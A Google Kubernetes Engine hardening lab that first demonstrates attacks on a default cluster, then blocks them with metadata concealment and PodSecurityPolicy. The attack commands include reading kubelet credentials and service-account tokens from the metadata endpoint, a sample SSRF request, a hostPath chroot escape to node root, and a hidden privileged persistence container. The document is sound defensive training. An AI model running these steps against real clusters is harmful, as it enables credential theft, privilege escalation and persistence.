Google Kubernetes Engine Secure Defaults Demo


Introduction

This lab demonstrates some of the security concerns of a default Kubernetes Engine cluster configuration and the corresponding hardening measures to prevent multiple paths of pod escape and cluster privilege escalation. These attack paths are relevant in the following scenarios:

  1. An application flaw in an external facing pod that allows for Server-Side Request Forgery (SSRF) attacks.
  2. A fully compromised container inside a pod allowing for Remote Command Execution (RCE).
  3. A malicious internal user or an attacker with a set of compromised internal user credentials with the ability to create/update a pod in a given namespace.

The following security-related configurations will be tested in both their default (disabled) and hardened (enabled) states to demonstrate the real-world implications of these settings:

  • Blocking access to the legacy Compute Metadata API endpoint
  • The GKE Metadata Concealment proxy
  • The PodSecurityPolicy Admission Controller

Objectives

Upon completion of this lab, you will understand the need for protecting the GKE Instance Metadata and defining appropriate PodSecurityPolicy policies for your environment.

You will:

  1. Create a small GKE cluster in an existing GCP project.
  2. Validate the most common paths of pod escape and cluster privilege escalation from the perspective of a malicious internal user.
  3. Harden the GKE cluster for these issues by attaching a new node pool with improved security settings.
  4. Validate the cluster no longer allows for each of those actions to occur.

Prerequisites

  • Access to an existing Google Cloud project with the Kubernetes Engine service enabled. If you do not have a Google Cloud account, please sign up for a free trial here.
  • A Google Cloud account and project are required for this demo. The project must have sufficient quota to run a Kubernetes Engine cluster with at least 3 vCPUs and 10 GB of RAM. How to check your account's quota is documented here: quotas (see also the example below).
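
One quick way to check the relevant quotas from the command line is with gcloud; the commands below are a rough sketch and simply print the region and project descriptions, which include quota limits and current usage:

# Regional quotas (including CPUS) for the region you plan to use
gcloud compute regions describe us-central1

# Project-wide quotas
gcloud compute project-info describe --project "$(gcloud config get-value project)"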

Supported Operating Systems

This demo can be run from macOS, Linux, or, alternatively, directly from Google Cloud Shell. The latter option is the simplest, as it requires only browser access to GCP and no additional software. Instructions for both alternatives can be found below.

Deploying Demo from Google Cloud Shell

NOTE: This section can be skipped if the cloud deployment is being performed without Cloud Shell, for instance from a local machine or from a server outside GCP.

Google Cloud Shell is a browser-based terminal that Google provides to interact with your GCP resources. It is backed by a free Compute Engine instance that comes with many useful tools already installed, including everything required to run this demo.

Click the button below to open the demo in your Cloud Shell:

Open in Cloud Shell

To prepare gcloud for use in Cloud Shell, execute the following command in the terminal at the bottom of the browser window you just opened:

gcloud init

Respond to the prompts and continue with the following deployment instructions. The prompts will include the account you want to run as, the current project, and, optionally, the default region and zone. These settings configure Cloud Shell itself; the actual project, region, and zone used by the demo will be configured separately below.

Deploying the Demo without Cloud Shell

NOTE: If the demo is being deployed via Cloud Shell, as described above, this section can be skipped.

For deployments without using Cloud Shell, you will need access to a computer providing a bash shell with the following tools installed:

  • Google Cloud SDK (gcloud)
  • kubectl
  • git

Use git to clone this project to your local machine:

git clone https://github.com/GoogleCloudPlatform/gke-secure-defaults-demo

When downloading is complete, change your current working directory to the new project:

cd gke-secure-defaults-demo

Continue with the instructions below, running all commands from this directory.

Deployment Steps

NOTE: The following instructions are applicable for deployments performed both with and without Cloud Shell.

To deploy the cluster, execute the following command:

./create.sh -c default-cluster

Replace the text default-cluster with the name of the cluster that you would like to create.

The create script will output the following message when complete:

...snip...
NAME          LOCATION    MASTER_VERSION  MASTER_IP     MACHINE_TYPE   NODE_VERSION  NUM_NODES  STATUS
default-cluster  us-central1-a  1.12.8-gke.6    34.66.214.195  n1-standard-1  1.12.8-gke.6  2          RUNNING
Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.

The script will:

  1. Enable the necessary APIs in your project. Specifically, compute and container.
  2. Create a new Kubernetes Engine cluster in your current ZONE, VPC and network that omits configuring the GKE Metadata Concealment proxy and does not enable the setting to block access to the Legacy Compute Metadata API.
  3. Retrieve your cluster credentials to enable kubectl usage.

After the cluster is created successfully, check your installed version of Kubernetes using the kubectl version command:

kubectl version

Client Version: version.Info{Major:"1", Minor:"14", GitVersion:"v1.14.3", GitCommit:"5e53fd6bc17c0dec8434817e69b04a25d8ae0ff0", GitTreeState:"clean", BuildDate:"2019-06-06T01:44:30Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"darwin/amd64"}
Server Version: version.Info{Major:"1", Minor:"12+", GitVersion:"v1.12.8-gke.10", GitCommit:"f53039cc1e5295eed20969a4f10fb6ad99461e37", GitTreeState:"clean", BuildDate:"2019-06-19T20:48:40Z", GoVersion:"go1.10.8b4", Compiler:"gc", Platform:"linux/amd64"}

Your kubectl version (Client) should be within two minor releases of the GKE cluster created (Server).

Run a Google Cloud-SDK pod

From your Cloud Shell prompt, launch a single instance of the Google Cloud-SDK container that will be automatically removed after exiting from the shell:

kubectl run -it --generator=run-pod/v1 --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

This will take a few moments to complete.

You should now have a bash shell inside the pod's container:

root@gcloud:/#

It may take a few seconds for the container to be started and the command prompt to be displayed. If you don't see a command prompt, try pressing Enter.

Explore the Legacy Compute Metadata Endpoint

In GKE Clusters created with version 1.11 or below, the "Legacy" or v1beta1 Compute Metadata endpoint is available by default. Unlike the current Compute Metadata version, v1, the v1beta1 Compute Metadata endpoint does not require a custom HTTP header to be included in all requests. On new GKE Clusters created at version 1.12 or greater, the legacy Compute Engine metadata endpoints are now disabled by default. For more information, see: Protecting Cluster Metadata

Run the following command to access the "Legacy" Compute Metadata endpoint without requiring a custom HTTP header to get the GCE Instance name where this pod is running:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name && echo

gke-default-cluster-default-pool-b57a043a-6z5v

The && echo command is to aid with terminal formatting and output readability. Now, re-run the same command, but instead use the v1 Compute Metadata endpoint:

curl -s http://metadata.google.internal/computeMetadata/v1/instance/name && echo

...snip...
Your client does not have permission to get URL <code>/computeMetadata/v1/instance/name</code> from this server. Missing Metadata-Flavor:Google header.
...snip...

Notice how it returns an error stating that it requires the custom HTTP header to be present. Add the custom header on the next run and retrieve the GCE instance name that is running this pod:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name && echo

gke-default-cluster-default-pool-b57a043a-6z5v

Without requiring a custom HTTP header when accessing the GCE Instance Metadata endpoint, a flaw in an application that allows an attacker to trick the code into retrieving the contents of an attacker-specified web URL could provide a simple method for enumeration and potential credential exfiltration. By requiring a custom HTTP header, the attacker needs to exploit an application flaw that allows them to control the URL and also add custom headers in order to carry out this attack successfully.
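
To make the SSRF scenario concrete, imagine an application endpoint that fetches whatever URL it is given and returns the response to the caller. The request below is purely a hypothetical illustration; vulnerable-app.example.com and its url parameter do not exist in this demo:

# Hypothetical SSRF: the vulnerable application fetches the attacker-supplied URL,
# which points at the legacy metadata endpoint (no custom header required)
curl -s "https://vulnerable-app.example.com/fetch?url=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token"

Because the v1beta1 endpoint accepts requests without the Metadata-Flavor: Google header, controlling the URL alone is enough; against the v1 endpoint, the attacker would also need some way to inject that custom header.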

Keep this shell inside the pod available for the next step. If you accidentally exit from the pod, simply re-run:

kubectl run -it --generator=run-pod/v1 --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

Explore the GKE node bootstrapping credentials

From inside the same pod shell, run the following command to list the attributes associated with the underlying GCE instances. Be sure to include the trailing slash:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/

Perhaps the most sensitive data in this listing is kube-env. It contains several variables which the kubelet uses as initial credentials when attaching the node to the GKE cluster. The variables CA_CERT, KUBELET_CERT, and KUBELET_KEY contain this information and are therefore considered sensitive to non-cluster administrators.

To see the potentially sensitive variables and data, run the following command:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env
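
The output is a large set of KEY: value pairs. As a rough sketch (the exact formatting of kube-env can vary between GKE versions), the credential variables can be picked out of that output like this:

# List only the bootstrapping credential variables; their values are base64-encoded PEM data
curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env \
  | grep -E '^(CA_CERT|KUBELET_CERT|KUBELET_KEY):'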

Therefore, in any of the following situations:

  1. A flaw that allows for SSRF in a pod application
  2. An application or library flaw that allows for RCE in a pod
  3. An internal user with the ability to create or exec into a pod

There exists a high likelihood of compromise and exfiltration of sensitive kubelet bootstrapping credentials via the Compute Metadata endpoint. In certain circumstances, these kubelet credentials can be leveraged to escalate privileges to cluster-admin and thereby gain full control of the GKE cluster, including all data, applications, and access to the underlying nodes.

Leverage the Permissions Assigned to this Node Pool's Service Account

By default, GCP projects with the Compute API enabled have a default service account, named in the format NNNNNNNNNN-compute@developer.gserviceaccount.com, with the project Editor role attached to it. Also by default, GKE clusters created without specifying a service account will utilize the default Compute service account and attach it to all worker nodes.

Run the following curl command to list the OAuth scopes associated with the service account attached to the underlying GCE instance:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/trace.append

The combination of authentication scopes and the permissions of the service account dictates what applications on this node can access. The above list is the minimum scopes needed for most GKE clusters, but some use cases require increased scopes.

If the authentication scope were to be configured during cluster creation to include https://www.googleapis.com/auth/cloud-platform, this would allow any GCP API to be considered "in scope", and only the IAM permissions assigned to the service account would determine what can be accessed. If the default service account is in use and the default IAM Role of Editor was not modified, this effectively means that any pod on this node pool has Editor permissions to the GCP project where the GKE cluster is deployed. As the Editor IAM Role has a wide range of read/write permissions to interact with resources in the project such as Compute instances, GCS buckets, GCR registries, and more, this is most likely not desired.
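
To see why the combination of scopes and IAM roles matters in practice, note that any process with access to the metadata endpoint can request an OAuth access token for the node's service account and use it directly against Google APIs. The following is a sketch only; my-project-id is a placeholder, and whether the final call succeeds depends entirely on the token's scopes and the service account's IAM roles:

# Fetch an access token for the node's service account from the metadata endpoint
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token \
  | sed -E 's/.*"access_token" *: *"([^"]+)".*/\1/')

# Attempt to list Cloud Storage buckets in the project using that token
curl -s -H "Authorization: Bearer ${TOKEN}" \
  "https://storage.googleapis.com/storage/v1/b?project=my-project-id"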

Exit out of this pod by typing:

exit

Deploy a pod that mounts the host filesystem

One of the simplest paths for "escaping" to the underlying host is by mounting the host's filesystem into the pod's filesystem using standard Kubernetes volumes and volumeMounts in a Pod specification.

To demonstrate this, run the following to create a Pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

kubectl apply -f manifests/hostpath.yml
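
For reference, the manifest being applied follows the standard hostPath pattern. The sketch below is illustrative only (the pod name and image are assumptions, and the repository's manifests/hostpath.yml remains the file actually used by this lab); it mounts the node's / into the container at /rootfs:

# Illustrative equivalent of a hostPath pod, written as a heredoc so it can be applied directly if desired
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-example
spec:
  containers:
  - name: hostpath-example
    image: google/cloud-sdk:latest
    command: ["sleep", "infinity"]
    volumeMounts:
    - name: rootfs
      mountPath: /rootfs
  volumes:
  - name: rootfs
    hostPath:
      path: /
EOF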

Run kubectl get pod and re-run until it's in the "Running" state:

kubectl get pod

NAME       READY   STATUS    RESTARTS   AGE
hostpath   1/1     Running   0          30s

Explore and compromise the underlying host

Run the following to obtain a shell inside the pod you just created:

kubectl exec -it hostpath -- bash

Switch the pod shell's root filesystem to point to that of the underlying host:

chroot /rootfs /bin/bash

hostpath / #

With those simple commands, the pod is now effectively a root shell on the node. You are now able to do the following:

  • Run the standard docker command with full permissions: docker ps
  • List all local docker images: docker images
  • Run a privileged docker container of your choosing: docker run --privileged <imagename>:<imageversion>
  • Examine the Kubernetes secrets mounted on the node: mount | grep volumes | awk '{print $3}' | xargs ls
  • Exec into any running container (even into another pod in another namespace): docker exec -it <docker container ID> sh

Nearly every operation that the root user can perform is available to this pod shell. This includes persistence mechanisms like adding SSH users/keys, running privileged docker containers on the host outside the view of Kubernetes, and much more.
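
As one hypothetical illustration of such persistence (the container name and image here are arbitrary), an attacker in this chroot shell could start a privileged container directly with docker, entirely outside the view of the Kubernetes API:

# Runs outside Kubernetes' view: kubectl will never list this container,
# and --restart=always brings it back automatically after node reboots
docker run -d --privileged --restart=always --name shadow-workload alpine:latest tail -f /dev/null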

To exit the pod shell, run exit twice - once to leave the chroot and another to leave the pod's shell:

exit
exit

Now you can delete the hostpath pod:

kubectl delete -f manifests/hostpath.yml

pod "hostpath" deleted

Understand the available controls

The next steps of this demo will cover:

  • Disabling the Legacy GCE Metadata API Endpoint - By specifying a custom metadata key and value, the v1beta1 metadata endpoint will no longer be available from the instance.
  • Enable Metadata Concealment - By passing an additional configuration during cluster and/or node pool creation, a lightweight proxy is installed on each node that proxies all requests to the Metadata API and prevents access to sensitive endpoints.
  • Enable and configure PodSecurityPolicy - Configuring this option on a GKE cluster will add the PodSecurityPolicy Admission Controller, which can be used to restrict the use of insecure settings during Pod creation. In this demo's case, it prevents containers from running as the root user and from mounting the underlying host filesystem.

Deploy a second node pool

To enable you to experiment with and without the Metadata endpoint protections in place, you'll create a second node pool that includes two additional settings. Pods that are scheduled to the generic node pool will not have the protections, and Pods scheduled to the second node pool will have them enabled.

Note: In GKE versions 1.12 and newer, the --metadata=disable-legacy-endpoints=true setting is automatically enabled. The next command defines it explicitly for clarity.

Create the second node pool:

./second-pool.sh -c default-cluster

NAME         MACHINE_TYPE   DISK_SIZE_GB  NODE_VERSION
second-pool  n1-standard-1  100           1.12.8-gke.6
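
The second-pool.sh script is the source of truth for this step, but the gcloud invocation it wraps is likely similar to the following sketch (cluster name, zone, and sizing are placeholders; --workload-metadata-from-node was a beta flag in the GKE versions this lab targets):

# Sketch: a node pool with legacy metadata endpoints disabled and metadata concealment enabled
gcloud beta container node-pools create second-pool \
  --cluster=default-cluster \
  --zone=us-central1-a \
  --machine-type=n1-standard-1 \
  --metadata=disable-legacy-endpoints=true \
  --workload-metadata-from-node=SECURE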

Run a Google Cloud-SDK pod

In Cloud Shell, launch a single instance of the Google Cloud-SDK container that will run only on the second node pool with the protections enabled, and that will not run as the root user:

kubectl run -it --generator=run-pod/v1 --rm gcloud --image=google/cloud-sdk:latest --restart=Never --overrides='{ "apiVersion": "v1", "spec": { "securityContext": { "runAsUser": 65534, "fsGroup": 65534 }, "nodeSelector": { "cloud.google.com/gke-nodepool": "second-pool" } } }' -- bash

You should now have a bash shell inside the pod's container running on the node pool named second-pool. You should see the following:

nobody@gcloud:/$

It may take a few seconds for the container to be started and the command prompt to be displayed.

If you don't see a command prompt, try pressing Enter.

Explore various blocked endpoints

With the configuration of the second node pool set to --metadata=disable-legacy-endpoints=true, the following command will now fail as expected:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name

...snip...
Legacy metadata endpoints are disabled. Please use the /v1/ endpoint.
...snip...

With the configuration of the second node pool set to --workload-metadata-from-node=SECURE, the following command to retrieve the sensitive file, kube-env, will now fail:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

This metadata endpoint is concealed.

But other commands to non-sensitive endpoints will still succeed if the proper HTTP header is passed:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name && echo

gke-default-cluster-second-pool-8fbd68c5-gzzp

Exit out of the pod:

exit

You should now be back to your shell.

Deploy PodSecurityPolicy objects

In order to have the necessary permissions to proceed, grant explicit permissions to your own user account to become cluster-admin:

kubectl create clusterrolebinding clusteradmin --clusterrole=cluster-admin --user="$(gcloud config list account --format 'value(core.account)')"

clusterrolebinding.rbac.authorization.k8s.io/clusteradmin created

Next, deploy a more restrictive PodSecurityPolicy that will apply to all authenticated users in the default namespace:

kubectl apply -f manifests/restrictive-psp.yml

podsecuritypolicy.extensions/restrictive-psp created
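
The file manifests/restrictive-psp.yml in the repository defines the actual policy. As a rough sketch of what such a restrictive PodSecurityPolicy typically contains (field values here are assumptions, not copied from the repo), it forbids privileged containers, requires a non-root user, and leaves hostPath out of the allowed volume types. The snippet below simply writes a reference copy to /tmp for inspection rather than applying anything:

# Reference sketch only; the policy created above by the repo's manifest is the one enforced in this lab
cat <<'EOF' > /tmp/restrictive-psp-example.yml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restrictive-psp-example
spec:
  privileged: false
  allowPrivilegeEscalation: false
  runAsUser:
    rule: MustRunAsNonRoot
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
EOF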

Next, add the ClusterRole that provides the necessary ability to "use" this PodSecurityPolicy.

kubectl apply -f manifests/restrictive-psp-clusterrole.yml

clusterrole.rbac.authorization.k8s.io/restrictive-psp created

Finally, create a RoleBinding in the default namespace that allows any authenticated user permission to leverage the PodSecurityPolicy.

kubectl apply -f manifests/restrictive-psp-clusterrolebinding.yml

rolebinding.rbac.authorization.k8s.io/restrictive-psp created
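
For reference, the ClusterRole and RoleBinding just applied typically look like the sketch below (the names mirror the outputs above, but the repository's manifests remain authoritative); again, this is written to /tmp for inspection rather than applied a second time:

# Reference sketch: grant "use" of the restrictive-psp policy to all authenticated users in the default namespace
cat <<'EOF' > /tmp/restrictive-psp-rbac-example.yml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: restrictive-psp
rules:
- apiGroups:
  - policy
  resources:
  - podsecuritypolicies
  resourceNames:
  - restrictive-psp
  verbs:
  - use
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: restrictive-psp
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: restrictive-psp
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated
EOF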

Note: In a real environment, consider replacing the system:authenticated user in the ClusterRoleBinding or Namespace RoleBinding with the specific user or service accounts that you want to have the ability to create pods in the default namespace.

Enable PodSecurityPolicy

Next, enable the PodSecurityPolicy Admission Controller:

./enable-psp.sh -c default-cluster

This will take a few minutes to complete.
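
For context, enabling the admission controller on an existing cluster uses a beta gcloud flag; the enable-psp.sh script likely wraps a command similar to this sketch (cluster name and zone are placeholders):

# Sketch: turn on the PodSecurityPolicy admission controller for the cluster
gcloud beta container clusters update default-cluster \
  --zone=us-central1-a \
  --enable-pod-security-policy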

Deploy a blocked pod that mounts the host filesystem

Because the account used to deploy the GKE cluster was granted cluster-admin permissions in a previous step, it's necessary to create a separate "user" account to interact with the cluster and validate the PodSecurityPolicy enforcement. To do this, run:

./create-demo-developer.sh -c default-cluster

Created service account [demo-developer].
...snip...
Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.

The create-demo-developer.sh script will create a new service account named demo-developer, grant that service account the container.developer IAM role, create a service account key, configure gcloud to use that service account key, and then configure kubectl to use those service account credentials when communicating with the cluster.
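
The script itself is authoritative, but the sequence it performs corresponds roughly to the following gcloud commands (a sketch; the key path, zone, and cluster name are placeholders):

PROJECT=$(gcloud config get-value project)

# 1. Create the service account and grant it the Kubernetes Engine Developer role
gcloud iam service-accounts create demo-developer
gcloud projects add-iam-policy-binding "${PROJECT}" \
  --member="serviceAccount:demo-developer@${PROJECT}.iam.gserviceaccount.com" \
  --role="roles/container.developer"

# 2. Create a key for the service account and switch gcloud to that identity
gcloud iam service-accounts keys create /tmp/demo-developer-key.json \
  --iam-account="demo-developer@${PROJECT}.iam.gserviceaccount.com"
gcloud auth activate-service-account --key-file=/tmp/demo-developer-key.json

# 3. Refresh the kubectl credentials so they use the new identity
gcloud container clusters get-credentials default-cluster --zone=us-central1-a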

Now, try to create another pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

kubectl apply -f manifests/hostpath.yml

This output validates that the request is blocked by the PodSecurityPolicy:

Error from server (Forbidden): error when creating "STDIN": pods "hostpath" is forbidden: unable to validate against any pod security policy: [spec.volumes[0]: Invalid value: "hostPath": hostPath volumes are not allowed to be used]

Deploy another pod that meets the criteria of the restrictive-psp:

kubectl apply -f manifests/nohostpath.yml

pod/nohostpath created

To view the annotation that gets added to the pod indicating which PodSecurityPolicy authorized the creation, run:

kubectl get pod nohostpath -o=jsonpath="{ .metadata.annotations.kubernetes\.io/psp }" && echo

restrictive-psp

Congratulations! In this lab you configured a default Kubernetes cluster in Google Kubernetes Engine. You then probed and exploited the access available to your pod, hardened the cluster, and validated those malicious actions were no longer possible.

Validation

The following script will validate that the demo is deployed correctly:

./validate.sh -c default-cluster

Replace the text default-cluster with the name of the cluster that you would like to validate. If the script fails, it will output:

Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.

Tear Down

Log back in as your user account.

gcloud auth login

The following script will destroy the Kubernetes Engine cluster.

./delete.sh -c default-cluster

Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.
Deleting cluster
Deleting cluster default-cluster...
...snip...
deleted service account [demo-developer@my-project-id.iam.gserviceaccount.com]

Replace the text default-cluster with the name of the cluster that you would like to delete.

Troubleshooting

Errors about project quotas

If you get errors about quotas, please increase your quota in the project. See here for more details.

Relevant Materials

  1. Google Cloud Quotas
  2. Signup for Google Cloud
  3. Google Cloud Shell
  4. Hardening your Cluster
  5. PodSecurityPolicy
  6. Restricting Pod Permissions
  7. Node Service Accounts
  8. Protecting Node Metadata
  9. Launch Stages
  10. Protecting Cluster Metadata

Note: this is not an officially supported Google product.
